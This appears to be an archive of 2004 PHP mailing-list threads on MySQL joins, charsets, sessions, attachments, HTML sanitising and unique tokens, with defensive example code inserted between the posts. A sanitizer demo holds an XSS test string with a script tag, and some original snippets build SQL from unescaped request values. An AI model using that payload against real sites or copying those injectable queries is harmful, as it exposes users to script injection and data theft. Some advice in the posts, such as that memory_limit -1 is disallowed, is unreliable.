[PHP] Re: Close all open tags in HTML text

2004-12-09 Thread Daniel Schierbeck
Matt Palermo wrote:
I am allowing users to input HTML code into a textarea.  After they input 
this, I want to output their HTML to the browser.  In order for the document 
to be safe, I need to close all open HTML tags that have been left open by 
the user, along with any open comments.  Is there a way to take an HTML 
string and add closing tags and comments to it if needed?

Thanks,
Matt 
I would use a regular expression to grab the valid opening and closing 
HTML tags, and use something á la htmlentities() on the rest of the 
document.

--
Daniel Schierbeck
Help spread Firefox (www.getfirefox.com): 
http://www.spreadfirefox.com/?q=user/register&r=6584

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[PHP] MYSQL Query question

2004-12-09 Thread Reinhart Viane
Table chat_online:
session (varchar)
activity (datetime)
 
Table persons
persons_region_int(int)
 
Table regions
region_id
region_name
 
On a page I list all persons who are in the chat_online database and
within a certain period:
$limit_time = time() - 130; // 2 Minutes time out. 60 * 2 = 120 
$sqlchatonline = "SELECT * FROM chat_online WHERE
UNIX_TIMESTAMP(activity) >= $limit_time AND
(sessionid!='".session_id()."')";
$resultchatonline=mysql_query($sqlchatonline) or die (mysql_error());
$chatvisits = mysql_num_rows($resultchatonline);
 
while($rowchatonline = mysql_fetch_object($resultchatonline)){
   $chattersessionid=$rowchatonline->sessionid;
   //get the username, userid, mainpicid from the online chatter
   $getinfo= "select * from persons where
person_session_id='$chattersessionid'";
   $resultgetinfo = mysql_query($getinfo) or die (mysql_error());
   $rowgetinfo= mysql_fetch_array($resultgetinfo);
echo $rowgetinfo['person_nick'];
}
 
Now I want these online chatters to be listed by person_region_int:
something like:
region A
chatter1
chatter2
region B
none
region C
chatter3
chatter4
 
How do I do this?
 
And a second question:
I have created a menu box which lists all regions; if an option is
selected by the user, I only want to show the online chatters of the
selected region (selecting an option defines a variable $region which
holds the region_id).
Something like:
if ($region) {
$sqlchatonline = "SELECT * FROM chat_online, persons WHERE
UNIX_TIMESTAMP(chat_online.activity) >= $limit_time AND
(chat_online.sessionid!='".session_id()."' AND
(persons.persons_region_int='$region')";
}
 
This does not give me the correct result: it shows all online chatters *
total number of users of that region. It should be all online chatters
from that specified region.
 
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache when searching something. Does someone know a good
mysql manual site or a good mysql book?
 
Thx in advance
Reinhart
 

Reinhart Viane 
  [EMAIL PROTECTED] 
Domos || D-Studio 
Graaf Van Egmontstraat 15/3 -- B 2800 Mechelen -- tel +32 15 44 89 01 --
fax +32 15 43 25 26 


STRICTLY PERSONAL AND CONFIDENTIAL 
This message may contain confidential and proprietary material for the
sole use of the intended 
recipient.  Any review or distribution by others is strictly prohibited.
If you are not the intended 
recipient please contact the sender and delete all copies.

 

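A worked version of both queries, added here as an example and not Reinhart's code. The post's second query has no condition linking a chat_online row to its persons row (`FROM chat_online, persons WHERE ...` with nothing tying the two tables together), so every online session is paired with every person in the chosen region, which is exactly the multiplied result it describes. One JOIN query below lists online chatters per region, keeps regions with nobody online (the "none" case), and can be narrowed to a single region. PDO with bound parameters is assumed in place of the mysql_query() calls in the post; $region comes from a user-chosen menu option, so it is bound as a parameter rather than pasted into the SQL string. Table and column names (regions.region_id, region_name, persons.persons_region_int, person_session_id, person_nick, chat_online.sessionid, activity) are the ones used in the post; the two-minute timeout follows the comment in the post's first query.

```php
<?php
// Added example, not Reinhart's code: one JOIN query, grouped per region.
// PDO with bound parameters is an assumption; table and column names follow the post.

function online_chatters_by_region(PDO $db, $limit_time, $own_session, $region = null) {
    // regions LEFT JOIN (persons JOIN chat_online): the inner join ties each
    // online row to its person, the outer join keeps regions with nobody online
    $sql = "SELECT r.region_name, p.person_nick
              FROM regions AS r
              LEFT JOIN (persons AS p
                         JOIN chat_online AS c
                           ON c.sessionid = p.person_session_id
                          AND UNIX_TIMESTAMP(c.activity) >= :limit_time
                          AND c.sessionid <> :own_session)
                ON p.persons_region_int = r.region_id";
    $params = [':limit_time' => (int) $limit_time, ':own_session' => $own_session];
    if ($region !== null) {
        $sql .= " WHERE r.region_id = :region";     // user's menu choice, bound, not interpolated
        $params[':region'] = (int) $region;
    }
    $sql .= " ORDER BY r.region_name, p.person_nick";

    $stmt = $db->prepare($sql);
    $stmt->execute($params);

    $grouped = [];                                  // region_name => list of nicks (may be empty)
    foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
        if (!isset($grouped[$row['region_name']])) {
            $grouped[$row['region_name']] = [];
        }
        if ($row['person_nick'] !== null) {         // NULL nick = region with nobody online
            $grouped[$row['region_name']][] = $row['person_nick'];
        }
    }
    return $grouped;
}

// Render the "region A / chatter1 / region B / none" listing from the post,
// escaping every value that came from the database before it reaches the browser.
function render_regions(array $grouped) {
    $out = '';
    foreach ($grouped as $region => $nicks) {
        $out .= htmlspecialchars($region, ENT_QUOTES, 'UTF-8') . "<br>\n";
        if (count($nicks) === 0) {
            $out .= "&nbsp;&nbsp;none<br>\n";
            continue;
        }
        foreach ($nicks as $nick) {
            $out .= '&nbsp;&nbsp;' . htmlspecialchars($nick, ENT_QUOTES, 'UTF-8') . "<br>\n";
        }
    }
    return $out;
}

// usage (connection details are placeholders):
// $db = new PDO('mysql:host=localhost;dbname=chat;charset=utf8', 'user', 'secret',
//               [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// session_start();
// $region = (isset($_GET['region']) && $_GET['region'] !== '') ? (int) $_GET['region'] : null;
// echo render_regions(online_chatters_by_region($db, time() - 120, session_id(), $region));
```

With $region left null the first question's listing comes out; with a region_id it answers the second, and because the join condition is in the ON clause, each online chatter appears once rather than once per person in the region.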

Re: [PHP] ini_set doesn't work

2004-12-09 Thread Thomas Munz
you set it to '-1'!!!

that's not allowed. You must have a value higher than zero. It's better you set 
it in general to 60. And you forgot the 'M' after the number like

 ini_set("memory_limit","-1M");

set it better to that:
ini_set("memory_limit","60M");


> hello,
>
> what do I have to change in php.ini, to allow thr
> ini_set("memory_limit",-1);
> command?
>
> It doesn't work in my script...
>
> regards
> Joerg




[PHP] Need shipping info

2004-12-09 Thread suneel
Hi guys...

Here I'm using a UPS service

Could any one tell what sort details we have to consider in the 
database 
while shipping the products to the shipment gateway

thanks & regards,
Suneel

[PHP] PHP4 mysqli with mysql 4.1.7?

2004-12-09 Thread Francis Mak
Hi,

This message is a bit long, but I hope somebody could help me on this issue,
thank you .

I am using mysql 4.1.0(default-character-set=utf8) with PHP 4.3.3.  All
tables are using utf8 charset.
I can insert, select and display the utf8 character without any problem
using PHP, I used the normal mysql_query operation, NOT mysqli.  Yes,
mysql_query works well in 4.1.0.

Now, I upgraded to 4.1.7(default-character-set=utf8).  I use mysql client
and I can see all data in 4.1.7 are utf8.  However, PHP shows all as ???.
>SHOW VARIABLES LIKE '%charset%'
>character_set_server  utf8
>character_set_system  utf8
>character_set_database  utf8
>character_set_client  utf8
>character_set_connection utf8
>character_set_results  utf8
>collation_connection  utf8_general_ci
>collation_database  utf8_general_ci
>collation_server  utf8_general_ci

I struggled for a few days and finally discovered a message in mysql-lists
by Marek Lewczuk (UTF-8 problem, 24/5/2004), he has the following in his PHP
script:

mysqli_query($c, "SET CHARACTER SET utf8;");
mysqli_query($c, "SELECT * FROM db");

I have never used mysqli before, and I found it is only available in PHP5.

I have several questions to ask:

1. Can I compile PHP4 with the mysqli extension?  Are there any tricks to do
this?
2. Why is mysql 4.1 + mysqli recommended, but not the normal mysql
extension?
3. If I upgrade to mysql 4.1.7 + PHP5, do I need to rewrite all of my
application to use mysqli instead of mysql?  Any advice on this issue?
4. I see that we must use mysqli_query($c, "SET CHARACTER SET utf8;");
before any query, can I compile the mysqli extension to use utf8 as default?
5. In http://www.php.net/manual/en/ref.mysql.php I see a note: " If you need
charsets other than latin (default), you have to install external (not
bundled) libmysql with compiled charset support. "  So, it means it is
possible to use mysql_query with utf8?
6. Any reason why I can use mysql_query with 4.1.0 without any problem?

I know there are many questions, but I hope somebody could help me.  And I
believe there are lots of people having the same upgrade issue.
if utf8 + 4.1.7 + mysqli_query is a must instead of 4.1.7 + mysql_query, I
am sure that there will be lots of problem come up as most PHP applications
are using mysql_query only.

THANK YOU VERY MUCH!!!

Francis Mak


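The charset fix this thread circles around, as an added example that is neither Francis's code nor Marek's: set the connection character set from PHP with mysqli_set_charset() instead of issuing "SET CHARACTER SET" before every query, then read back what the server has agreed to. The host, user and database names are placeholders. mysqli_set_charset() (PHP 5.0.5 and later) also updates the charset that mysqli_real_escape_string() uses, which a bare SET query does not, so escaping of multi-byte input stays correct; on MySQL 5.5.3 and later, utf8mb4 is the charset that covers all of Unicode, while utf8 as used here and in the post is MySQL's three-byte subset.

```php
<?php
// Added example, not code from the thread: force the connection charset from
// PHP and verify it. Connection parameters are placeholders (assumptions).

function connect_utf8($host, $user, $pass, $db, $charset = 'utf8') {
    $c = mysqli_connect($host, $user, $pass, $db);
    if (!$c) {
        throw new RuntimeException('connect failed: ' . mysqli_connect_error());
    }
    // Sets character_set_client/connection/results on the server AND tells the
    // client library which charset it is speaking, so escaping stays correct.
    // A plain "SET NAMES"/"SET CHARACTER SET" query only does the server half.
    if (!mysqli_set_charset($c, $charset)) {
        throw new RuntimeException('could not set charset: ' . mysqli_error($c));
    }
    return $c;
}

// Returns the character_set_* variables as seen by this connection,
// e.g. ['character_set_client' => 'utf8', ...], for logging or a startup check.
function connection_charsets(mysqli $c) {
    $res = mysqli_query($c, "SHOW VARIABLES LIKE 'character_set%'");
    if (!$res) {
        throw new RuntimeException(mysqli_error($c));
    }
    $vars = [];
    while ($row = mysqli_fetch_assoc($res)) {
        $vars[$row['Variable_name']] = $row['Value'];
    }
    mysqli_free_result($res);
    return $vars;
}

// Refuse to run if the connection is not actually using the expected charset;
// a client/results charset that differs from the stored data is a common cause
// of UTF-8 text coming back as "???".
function assert_charset(mysqli $c, $expected = 'utf8') {
    $vars = connection_charsets($c);
    foreach (['character_set_client', 'character_set_connection', 'character_set_results'] as $k) {
        $actual = isset($vars[$k]) ? $vars[$k] : 'unset';
        if ($actual !== $expected) {
            throw new RuntimeException("$k is $actual, expected $expected");
        }
    }
    return true;
}

// usage (placeholders): $c = connect_utf8('localhost', 'user', 'secret', 'mydb');
//                       assert_charset($c);
```

Setting the charset once per connection this way also answers question 4: no per-query SET is needed, and the my.cnf side can stay as it is.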
[PHP] Objects and sessions

2004-12-09 Thread Francisco M. Marzoa Alonso
Following code:

<?php
class SessionTestC {
   protected $value;
   function __construct ( $val ) {
      $this->value = $val;
   }
   function GetValue () {
      return $this->value;
   }
}
if ( isset ($_SESSION['TestObj'])) {
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'';
} else {
   session_start ();
   echo 'Session Test was not set.';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "Click here.";
}
?>

Gives me an error of incomplete object on second access, like this:

Fatal error: main() [function.main]: The script tried to 
execute a method or access a property of an incomplete object. Please 
ensure that the class definition "SessionTestC" of the object you are 
trying to operate on was loaded _before_ unserialize() gets called or 
provide a __autoload() function to load the class definition in 
/home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php on line 16

But as it can be seen, the class is defined in the script 
SessionTest.php itself, so... ??



[PHP] Re: mail with attachment

2004-12-09 Thread Dre
I did not try it yet .. but I will

"Manuel Lemos" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> Hello,
>
> Dre wrote:
>  > Thanks Manuel, I will check the class
>  >
>  > and here is the code of the mail sending script
>  > //==
>  >   >   $att_name = $_POST['att'];
>  >   echo $att_name;
>  >   $att_size = filesize($att_name);
>  >   $handle= fopen($att_name, "r");
>  >   $file = fread($handle, $att_size);
>
> You need to open the file as binary but I do not think that could cause
> the problem that you described. Did you try the class that I mentioned?
> Did it work?
>
> -- 
>
> Regards,
> Manuel Lemos
>
> PHP Classes - Free ready to use OOP components written in PHP
> http://www.phpclasses.org/
>
> PHP Reviews - Reviews of PHP books and other products
> http://www.phpclasses.org/reviews/
>
> Metastorage - Data object relational mapping layer generator
> http://www.meta-language.net/metastorage.html



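The attachment-reading lines quoted above, as an added example that is neither Dre's nor Manuel's code: the file is opened in binary mode as Manuel recommends, and because the file name arrives in $_POST['att'], only names that resolve to a file inside one fixed directory are accepted (the uploads directory path is an assumption). The MIME-part helper shows the base64 encoding an attachment needs on the wire.

```php
<?php
// Added example, not code from the thread: read a mail attachment safely.
// The uploads directory is an assumption; the requested name comes from
// $_POST['att'] as in the quoted script.

function read_attachment($requested_name, $upload_dir) {
    $base = realpath($upload_dir);
    if ($base === false) {
        throw new RuntimeException('upload directory missing');
    }
    // basename() drops any directory part the client put in the name
    // ("../x" becomes "x"); realpath() then resolves symlinks.
    $path = realpath($base . DIRECTORY_SEPARATOR . basename($requested_name));
    // realpath() is false for a missing file; the prefix test rejects a file
    // that resolved outside $base (for example through a symlink)
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($path)) {
        throw new RuntimeException('attachment not found');
    }
    $handle = fopen($path, 'rb');   // 'b': no newline translation, the point Manuel makes
    if ($handle === false) {
        throw new RuntimeException('cannot open attachment');
    }
    $data = stream_get_contents($handle);
    fclose($handle);
    return ['name' => basename($path), 'size' => strlen($data), 'data' => $data];
}

// One MIME part for the attachment: base64, wrapped at 76 columns as the
// transfer encoding requires, so binary content survives the mail transport.
function attachment_part(array $att, $boundary) {
    $name = str_replace(['"', "\r", "\n"], '', $att['name']);   // keep the header on one line
    return "--$boundary\r\n"
         . "Content-Type: application/octet-stream; name=\"$name\"\r\n"
         . "Content-Transfer-Encoding: base64\r\n"
         . "Content-Disposition: attachment; filename=\"$name\"\r\n\r\n"
         . chunk_split(base64_encode($att['data']), 76, "\r\n");
}

// usage: $att = read_attachment($_POST['att'], __DIR__ . '/uploads');
//        $body .= attachment_part($att, $boundary);
```

filesize() plus fread() as in the quoted script works too; stream_get_contents() simply avoids the separate size call and reads until EOF.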

Re: [PHP] Close all open tags in HTML text

2004-12-09 Thread Robin Vickery
On Wed, 8 Dec 2004 22:33:19 -0500, Matt Palermo <[EMAIL PROTECTED]> wrote:
> I am allowing users to input HTML code into a textarea.  After they input
> this, I want to output their HTML to the browser.  In order for the document
> to be safe, I need to close all open HTML tags that have been left open by
> the user, along with any open comments.  Is there a way to take an HTML
> string and add closing tags and comments to it if needed?

You might want to look at the html tidy functions for tidying and
repairing html:

   http://www.php.net/manual/en/ref.tidy.php

  -robin



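Daniel's approach in the first thread (keep recognised tags, run htmlentities() over the rest) and the tidy extension Robin points to attack the same problem from two sides: tidy repairs the markup, an allowlist filter decides what markup is permitted at all. Below is an added example, not code from either reply, of the allowlist side in plain PHP with no extension needed: only bare tags from a short allowlist (an assumption) pass through; everything else, including tags with attributes, <script>, and comment openers, is escaped with htmlspecialchars(); and any allowed tag left open is closed at the end so the user's text cannot break out of the enclosing page. Running the constructed input at the bottom shows the nested <b><i> closed in the right order and the script tag and comment rendered as literal text. tidy (tidy_repair_string() or tidy::cleanRepair()) remains useful afterwards when well-formed output for a whole document is wanted.

```php
<?php
// Added example, not Daniel's or Robin's code: allowlist-based HTML filter that
// escapes everything it does not recognise and closes what the user left open.
// The allowlist is an assumption.

function sanitize_user_html($input, array $allowed = ['b', 'i', 'u', 'em', 'strong', 'p', 'ul', 'ol', 'li']) {
    $allow = array_fill_keys(array_map('strtolower', $allowed), true);
    $void  = ['br' => true, 'hr' => true];   // never need a closing tag
    $open  = [];                              // stack of allowed tags currently open
    $out   = '';

    // Only bare tags like <b>, </b> or <br/> become tag tokens. Anything with
    // attributes (<a href=...>, <img onerror=...>) or a comment opener stays
    // inside a text token, and text tokens are always escaped.
    $tokens = preg_split('/(<\/?[a-zA-Z][a-zA-Z0-9]*\s*\/?>)/', $input, -1,
                         PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY);

    foreach ($tokens as $tok) {
        if (!preg_match('/^<(\/?)([a-zA-Z][a-zA-Z0-9]*)\s*(\/?)>$/', $tok, $m)) {
            $out .= htmlspecialchars($tok, ENT_QUOTES, 'UTF-8');   // plain text
            continue;
        }
        $name = strtolower($m[2]);
        if (isset($void[$name])) {
            $out .= "<$name>";
            continue;
        }
        if (!isset($allow[$name])) {
            $out .= htmlspecialchars($tok, ENT_QUOTES, 'UTF-8');   // <script> etc. shown literally
            continue;
        }
        if ($m[1] === '') {                       // opening tag
            if ($m[3] === '/') {
                $out .= "<$name></$name>";        // self-closed non-void tag: open and close
            } else {
                $open[] = $name;
                $out .= "<$name>";
            }
            continue;
        }
        // closing tag: only honour it if that tag is actually open, and close
        // everything opened after it first so nesting stays balanced
        if (!in_array($name, $open, true)) {
            $out .= htmlspecialchars($tok, ENT_QUOTES, 'UTF-8');   // stray closer
            continue;
        }
        while (($last = array_pop($open)) !== null) {
            $out .= "</$last>";
            if ($last === $name) {
                break;
            }
        }
    }
    // close whatever the user left open, innermost first
    while (($last = array_pop($open)) !== null) {
        $out .= "</$last>";
    }
    return $out;
}

// constructed input: nested tags left open, a script tag and an unterminated comment
echo sanitize_user_html('<b>hello <i>world <script>alert(1)</script><!-- still open'), "\n";
```

htmlspecialchars() is used rather than htmlentities(): escaping the five characters that have meaning in HTML is what stops the text from being parsed as markup, and the output stays valid UTF-8 without converting every accented character to an entity.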

[PHP] Question: urldecode

2004-12-09 Thread Stuart Felenstein
In my search page, the url returned comes back with
the ..err I forget what it's called, but query string
looks like this: %5B%5D=3.  I think the %5B and 5D
should be [].

What I think is needed is rawurldecode.  I've looked
through my code and think it belongs somewhere in this
block:

$queryString_rsVJ = "";
if (!empty($_SERVER['QUERY_STRING'])) {
  $params = explode("&", $_SERVER['QUERY_STRING']);
  $newParams = array();
  foreach ($params as $param) {
if (stristr($param, "pageNum_rsVJ") == false && 
stristr($param, "totalRows_rsVJ") == false) {
  array_push($newParams, $param);
}
  }
  if (count($newParams) != 0) {
$queryString_rsVJ = "&" .
htmlentities(implode("&", $newParams));
  }
}

would doing something like this make sense?:

$queryString_rsVJ = "&" .
htmlentities(rawurldecode(implode("&", $newParams)));

Feedback appreciated.

Thank you 
Stuart




Re: [PHP] duplicate md5 hash's

2004-12-09 Thread Richard Davey
Hello Guy,

Thursday, December 9, 2004, 11:39:27 AM, you wrote:

GB> $hash = md5(uniqid($message));

GB> where message is a string that the user will input.

GB> How likely is it that this hash might be repeated?

GB> I'm using the hash as a primary key in a database - the user gets sent
GB> the hash as part of a url to retrieve the details of that database row.

GB> (its a basic send to a friend e-card system).

GB> Is there any way that the same hash could have been generated more than
GB> once?

It's extremely unlikely (I cannot give you any stats as to how
unlikely though, sorry).

However why not just stick the $hash creation into a self-checking
loop. I.e. make the hash - check the database - does it exist already?
- If not then the hash is good, else repeat the process. Using uniqid
will give you a unique hash on each occasion so this process
shouldn't take very long at all even if it did find a duplicate a few
times (unlikely!)

Best regards,

Richard Davey
-- 
 http://www.launchcode.co.uk - PHP Development Services
 "I am not young enough to know everything." - Oscar Wilde




[PHP] [SOLUTION] Re: [PHP] Objects and sessions

2004-12-09 Thread Francisco M. Marzoa Alonso
Thomas Munz wrote:
I think it's not possible to init an object on a session. 

Yes, it can.
The problem was with serialization. With session.auto_start set to 1 in 
php.ini, it seems the session's objects are unserialized before the 
script is loaded, so the class is not loaded when the session unserializes the 
object, and therefore it fails to unserialize it as an instance of its 
class.

With session.auto_start set to 0 in php.ini you have to take care of 
resuming sessions by calling session_start() each time, but you can put that 
call after the class definition, so the object is unserialized afterwards, 
and the problem is solved.

This code works fine:

<?php
class SessionTestC {
   protected $value;
   function __construct ( $val ) {
      $this->value = $val;
   }
   function GetValue () {
      return $this->value;
   }
}
if ( isset ($_GET['close_session'])) {
   unset ($_SESSION);
   session_start ();
   session_destroy ();
}
session_start ();
if ( isset ($_SESSION['TestObj'])) {
   echo 'TestObj is an instance of '.get_class($_SESSION['TestObj']).'';
   echo '';
   print_r ($_SESSION['TestObj']);   // was $SESSION, an undefined variable
   echo '';

   echo "Close session.";
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'';
} else {
   echo 'Session Test was not set.';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "Click here.";
}

?>
BTW, I do not know if the code I've used to destroy the session is the 
best, but this is a secondary issue...



[PHP] allow_url_fopen ini directive not enough

2004-12-09 Thread Kelvin Jones
Hi,
I would like to see a new directive to go alongside "allow_url_fopen" to
allow people to turn on or off the ability to include/require a remote file.
The ability to include and execute a file as php from a remote host
leaves many applications open to cross-site-scripting attacks.
This would be easily avoidable if we had a directive
(allow_url_include?) that by default removed this capability.
Any thoughts?
Kelvin

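An added example, not Kelvin's code, of the application-side defence for the remote inclusion problem he raises: the client never supplies a path to include/require, only a key looked up in a fixed map, so no remote URL and no unexpected local file can be pulled in whatever allow_url_fopen says. The page map and the pages/ directory are assumptions. The second function reports the two directives; allow_url_include, the switch Kelvin asks for, was added in PHP 5.2 and defaults to Off.

```php
<?php
// Added example, not Kelvin's code: client data selects a key, never a path.
// The page map and the pages/ directory are assumptions.

function include_page($requested) {
    // allowlist: the only strings that can ever reach include/require
    $pages = ['home' => 'home.php', 'about' => 'about.php', 'contact' => 'contact.php'];
    if (!is_string($requested) || !isset($pages[$requested])) {
        return false;                               // unknown key; caller answers 404
    }
    $file = __DIR__ . '/pages/' . $pages[$requested];   // fixed local base directory
    if (!is_file($file)) {
        return false;
    }
    require $file;
    return true;
}

// The two runtime switches: allow_url_fopen governs fopen()/file_get_contents()
// on URLs; allow_url_include (added in PHP 5.2, default Off) separately governs
// include/require of URLs, which is the directive Kelvin asks for.
function remote_include_settings() {
    return [
        'allow_url_fopen'   => (bool) ini_get('allow_url_fopen'),
        'allow_url_include' => (bool) ini_get('allow_url_include'),
    ];
}

if (!include_page(isset($_GET['page']) ? $_GET['page'] : 'home')) {
    http_response_code(404);
    echo 'No such page';
}
```

Turning the directive off is worth doing, but the map is what makes the script safe on any PHP build: with it, the value of $_GET['page'] is never part of a file name.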

[PHP] duplicate md5 hash's

2004-12-09 Thread Guy Bowden
Hi,
I know this is highly unlikely... but I have this code:
$hash = md5(uniqid($message));
where message is a string that the user will input.
How likely is it that this hash might be repeated?
I'm using the hash as a primary key in a database - the user gets sent 
the hash as part of a url to retrieve the details of that database row.

(its a basic send to a friend e-card system).
Is there any way that the same hash could have been generated more than 
once?

Cheers,
Guy


Re: [PHP] duplicate md5 hash's

2004-12-09 Thread Guy Bowden
Thanks for the tip... I have now implemented a while loop to make sure 
that it goes into the db, as you say this should never actually loop, 
but if it does it should only loop once..

kind of extra security..
cheers
Richard Davey wrote:
Hello Guy,
Thursday, December 9, 2004, 11:39:27 AM, you wrote:
GB> $hash = md5(uniqid($message));
GB> where message is a string that the user will input.
GB> How likely is it that this hash might be repeated?
GB> I'm using the hash as a primary key in a database - the user gets sent
GB> the hash as part of a url to retrieve the details of that database row.
GB> (its a basic send to a friend e-card system).
GB> Is there any way that the same hash could have been generated more than
GB> once?
It's extremely unlikely (I cannot give you any stats as to how
unlikely though, sorry).
However why not just stick the $hash creation into a self-checking
loop. I.e. make the hash - check the database - does it exist already?
- If not then the hash is good, else repeat the process. Using uniqid
will give you a unique hash on each occasion so this process
shouldn't take very long at all even if it did find a duplicate a few
times (unlikely!)
Best regards,
Richard Davey


Re: [PHP] Objects and sessions

2004-12-09 Thread Thomas Munz
I think it's not possible to init an object on a session. Session will be 
rebuilt on each reload of the site based on the session id, I think...

Maybe here the object can't be rebuilt anymore...
> Following code:
>
> <?php
> class SessionTestC {
> protected $value;
>
> function __construct ( $val ) {
> $this->value = $val;
> }
>
> function GetValue () {
> return $this->value;
> }
> }
>
> if ( isset ($_SESSION['TestObj'])) {
> echo 'Session Test is set to:
> '.$_SESSION['TestObj']->GetValue().''; } else {
> session_start ();
> echo 'Session Test was not set.';
> $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
> echo "Click
> here."; }
>
> ?>
>
> Gives me an error of incomplete object on second access, like this:
>
> Fatal error: main() [function.main]: The script tried to
> execute a method or access a property of an incomplete object. Please
> ensure that the class definition "SessionTestC" of the object you are
> trying to operate on was loaded _before_ unserialize() gets called or
> provide a __autoload() function to load the class definition in
> /home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php on line 16
>
> But as it can be seen, the class is defined in the script
> SessionTest.php itself, so... ??




[PHP] best practice question..

2004-12-09 Thread Guy Bowden
On this note - what is considered "best practice" in a - sent to friend 
type thing.

i.e. User inputs their name + message + email + friends email into a 
html/flash form

friend gets a link to read the message.
currently I do this:
1 collect form input
2 create hash using the md5/uniqid method : $hash = md5(uniqid($key));
3 input data to database table using the hash as the primary key value
4 send email to friend with link containing the hash
5 user clicks on link
6 hash read in from the $_GET object
7 hash used to select message details from DB and displayed to the user
There's never a security issue here - i.e. i don't mind how many times / 
who reads the message, but just want to make it hard to just guess keys 
to read other messages (otherwise it would just be the db id)

This method works for me, but is it the *right* way?
Thanks for any input
Cheers,
Guy


Re: [PHP] Need shipping info

2004-12-09 Thread John Nichel
suneel wrote:
Hi guys...
Here I'm using a UPS service
Could any one tell what sort details we have to consider in the database 
while shipping the products to the shipment gateway

thanks & regards,
Suneel
You might want to consider asking a php question.

adds UPS to the list of things covered by the php-general list

--
By-Tor.com
...it's all about the Rush
http://www.by-tor.com


Re: [PHP] best practice question..

2004-12-09 Thread Richard Davey
Hello Guy,

Thursday, December 9, 2004, 12:34:03 PM, you wrote:

GB> There's never a security issue here - i.e. i don't mind how many times /
GB> who reads the message, but just want to make it hard to just guess keys
GB> to read other messages (otherwise it would just be the db id)

GB> This method works for me, but is it the *right* way?

There's no right or wrong way to do this - if it works for you, then
it works :)

The only thing I would strongly suggest is a check somewhere - if the
recipient has been sent an email already (perhaps within the last 30
days?) then you don't send them another one.

That way you're not open to being a spam bot.

Best regards,

Richard Davey
-- 
 http://www.launchcode.co.uk - PHP Development Services
 "I am not young enough to know everything." - Oscar Wilde



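The send-to-a-friend flow from Guy's seven steps, with Richard's two suggestions (retry when the key already exists; no second mail to the same recipient within 30 days), as an added example that is neither Guy's nor Richard's code. One caveat the thread does not state: uniqid() is built from the current time, so md5(uniqid($message)) is unique per call but not unpredictable, and guessability is the property Guy actually wants; random_bytes() (PHP 7 and later) draws from the system CSPRNG and gives a token that cannot be narrowed down by send time. The ecards table, its columns and a PDO connection opened with PDO::ERRMODE_EXCEPTION are assumptions; SQLSTATE 23000 is the integrity-constraint code MySQL returns for a duplicate UNIQUE key.

```php
<?php
// Added example, not code from the thread: CSPRNG token, insert with retry on a
// duplicate key, per-recipient throttle. Table "ecards" with columns token
// (UNIQUE), from_name, from_email, to_email, message, created_at is assumed;
// $db is a PDO connection opened with PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION.

function new_token() {
    // 16 bytes from the system CSPRNG = 128 bits; uniqid() by contrast is the
    // clock in hex, so a token built from it can be narrowed down by send time.
    return bin2hex(random_bytes(16));          // 32 lowercase hex characters
}

function recently_sent(PDO $db, $to_email, $days = 30) {
    $since = date('Y-m-d H:i:s', time() - $days * 86400);
    $stmt = $db->prepare('SELECT COUNT(*) FROM ecards WHERE to_email = :to AND created_at >= :since');
    $stmt->execute([':to' => $to_email, ':since' => $since]);
    return (int) $stmt->fetchColumn() > 0;
}

function store_ecard(PDO $db, $from_name, $from_email, $to_email, $message) {
    if (recently_sent($db, $to_email)) {
        return null;                            // caller reports "already sent recently"; no mail goes out
    }
    $stmt = $db->prepare(
        'INSERT INTO ecards (token, from_name, from_email, to_email, message, created_at)
         VALUES (:token, :from_name, :from_email, :to_email, :message, NOW())'
    );
    for ($attempt = 0; $attempt < 5; $attempt++) {
        $token = new_token();
        try {
            $stmt->execute([
                ':token' => $token, ':from_name' => $from_name, ':from_email' => $from_email,
                ':to_email' => $to_email, ':message' => $message,
            ]);
            return $token;                      // goes into the link mailed to the friend
        } catch (PDOException $e) {
            // SQLSTATE 23000: integrity constraint violation, here the UNIQUE
            // token; anything else is a real failure and propagates.
            if ((string) $e->getCode() !== '23000') {
                throw $e;
            }
        }
    }
    throw new RuntimeException('could not allocate a unique token');
}

function load_ecard(PDO $db, $token) {
    // accept only the exact shape we issue before the value reaches the database
    if (!is_string($token) || !preg_match('/^[0-9a-f]{32}$/', $token)) {
        return null;
    }
    $stmt = $db->prepare('SELECT from_name, message FROM ecards WHERE token = :token');
    $stmt->execute([':token' => $token]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// usage: $token = store_ecard($db, $_POST['name'], $_POST['email'], $_POST['friend'], $_POST['message']);
//        $card  = load_ecard($db, isset($_GET['id']) ? $_GET['id'] : '');
```

With a 128-bit random token the retry loop is there for correctness, not because a collision is expected; the recently_sent() check is what keeps the form from being driven as a mail relay, which is the point Richard makes.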

RE: [PHP] Question: urldecode

2004-12-09 Thread Ford, Mike
To view the terms under which this email is distributed, please go to 
http://disclaimer.leedsmet.ac.uk/email.htm



> -Original Message-
> From: Stuart Felenstein [mailto:[EMAIL PROTECTED] 
> Sent: 09 December 2004 11:52
> 
> In my search page, the url returned comes back with
> the ..err I forget what it's called, but query string
> looks like this: %5B%5D=3.  I think the %5B and 5D
> should be [].

Are you seeing the URL-encoded version *only* in your browser's
Address/Location bar?  If so, that's perfectly normal and nothing to worry
about -- it should be automatically decoded by the Web server before being
passed to PHP.

If you're seeing the encoded version actually in your PHP script, that
sounds like a major problem, possibly indicating a missing urldecode() or
extraneous urlencode() -- in which case, please post a more detailed
analysis of your problem, examples of the unwanted behaviour, and the
relevant portions of script.

Cheers!

Mike

-
Mike Ford,  Electronic Information Services Adviser,
Learning Support Services, Learning & Information Services, JG125, James
Graham Building, Leeds Metropolitan University, Headingley Campus, LEEDS,
